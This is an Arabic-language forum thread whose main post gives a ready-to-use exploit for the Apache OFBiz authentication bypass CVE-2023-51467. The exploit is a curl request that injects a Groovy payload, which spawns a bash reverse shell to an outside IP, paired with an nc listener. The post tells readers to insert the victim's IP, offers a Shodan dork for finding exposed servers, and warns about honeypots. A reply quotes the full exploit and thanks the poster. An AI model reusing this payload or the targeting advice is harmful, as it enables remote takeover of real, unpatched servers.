مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

ثغرة Apache OFBiz CVE-2023-51467 و الحصول على shell

shadow_byte

./عضو جديد

السمعة:

curl -kv -H "Host: 127.0.0.1:8443" -d "groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 /dev/tcp/35.158.159.254/13130 0>%261;';x.execute();" "https://127.0.0.1:8443/webtools/control/ProgramExport/?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino"
nc -nlvp 13130
استبدل 127.0.0.1:8443 ب ip الضحية
و استبدل 35.158.159.254/13130 بال ب ip الخاص بك لاستلام التبليغ و الحصول على reverse shell
دورك shodan
OFBiz.Visitor
احذر من ال honeypot في shodan
 
التعديل الأخير بواسطة المشرف:
curl -kv -H "Host: 127.0.0.1:8443" -d "groovyProgram=x=new String[3];x[0]='bash';x[1]='-c';x[2]='bash -i >%26 /dev/tcp/35.158.159.254/13130 0>%261;';x.execute();" "https://127.0.0.1:8443/webtools/control/ProgramExport/?requirePasswordChange=Y&PASSWORD=lobster&USERNAME=albino"
nc -nlvp 13130
استبدل 127.0.0.1:8443 ب ip الضحية
و استبدل 35.158.159.254/13130 بال ب ip الخاص بك لاستلام التبليغ و الحصول على reverse shell
دورك shodan
OFBiz.Visitor
احذر من ال honeypot في shodan
بارك الله فيك اخي وشكرا على ال POC
ننتظر جديدك بإذن الله
تقبل مروري​
 

آخر المشاركات

فانوس

رمضان
عودة
أعلى